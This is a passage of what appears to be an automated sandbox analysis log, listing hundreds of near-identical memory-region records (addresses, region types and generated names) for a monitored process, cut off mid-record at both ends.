pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18612 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18613 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18617 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18618 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18619 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18620 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18621 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18622 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18623 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18624 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18644 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18645 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18646 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18647 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18648 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18707 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18708 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18711 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18712 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18725 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18726 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18768 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18769 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 